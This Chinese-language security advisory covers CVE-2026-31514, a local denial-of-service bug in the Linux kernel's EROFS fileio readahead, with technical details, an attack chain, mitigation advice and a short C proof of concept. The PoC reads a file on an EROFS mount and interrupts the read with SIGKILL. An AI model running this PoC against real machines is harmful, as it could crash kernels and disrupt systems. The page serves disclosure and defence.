CVE-2026-31514 CVSS 5.5 中危

CVE-2026-31514 Linux内核EROFS本地拒绝服务漏洞

披露日期: 2026-04-22

来源: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

漏洞信息

漏洞编号

CVE-2026-31514

漏洞类型

拒绝服务

CVSS评分

5.5 中危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Linux Kernel

漏洞概述

Linux内核中的EROFS文件系统在处理文件回挂载时存在一个漏洞。当IO请求被SIGKILL信号中断时，系统仅返回部分复制的字节数，但错误地将bio中未使用的内存页标记为最新状态。这种逻辑错误可能导致内核状态不一致，从而引发系统崩溃或拒绝服务。

技术细节

该漏洞位于Linux内核的EROFS文件系统驱动中，涉及fileio模式的预读机制。漏洞触发路径始于vfs_read，经过filemap_read最终调用erofs_fileio_rq_submit。在异步IO完成回调erofs_fileio_ki_complete中，代码未能正确处理短读取场景。当读取操作因SIGKILL信号而中断时，vfs_iocb_iter_read返回实际读取字节数，但回调函数仍将bio关联的所有folio标记为PG_uptodate。这意味着未成功读取数据的页面被视为有效数据，后续访问这些页面时会导致内核逻辑错误、数据损坏或内核崩溃。由于攻击向量为本地且需要低权限，恶意用户可通过特定的读取操作和信号发送触发此漏洞。

攻击链分析

STEP 1

1. 本地访问

攻击者获取本地低权限用户访问权限。

STEP 2

2. 触发IO

访问挂载的EROFS文件系统，执行大文件读取操作以触发预读机制。

STEP 3

3. 中断操作

在IO处理过程中，向进程发送SIGKILL信号，强制中断读取操作。

STEP 4

4. 状态标记错误

内核错误地将bio中未完成读取的folio页标记为最新状态。

STEP 5

5. 系统崩溃

后续访问错误标记的内存页导致内核崩溃或拒绝服务。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

/*
 * PoC for CVE-2026-31514
 * Triggering the race condition in EROFS fileio readahead.
 */
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <signal.h>
#include <sys/types.h>
#include <sys/wait.h>

void trigger_read() {
    // Path to a file on an EROFS filesystem mounted with fileio
    const char *target = "/mnt/erofs/large_file.bin";
    FILE *f = fopen(target, "r");
    if (!f) return;

    char buf[8192];
    // Read to trigger readahead
    while (fread(buf, 1, sizeof(buf), f) > 0);
    fclose(f);
}

int main() {
    pid_t pid = fork();
    if (pid == 0) {
        trigger_read();
    } else {
        // Wait for IO to start, then send SIGKILL
        usleep(20000); 
        kill(pid, SIGKILL);
        wait(NULL);
        printf("Signal sent. Potential kernel panic triggered.");
    }
    return 0;
}

影响范围

Linux Kernel (Mainline)

Linux Kernel (Stable branches prior to patch 5a5f23ef5431639db1ac3a0b274aef3a84cc413c)

防御指南

临时缓解措施

建议立即更新操作系统内核以修复该漏洞。如果无法立即更新，可以暂时禁用EROFS的文件回挂载功能或严格限制本地用户的文件访问权限以降低风险。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表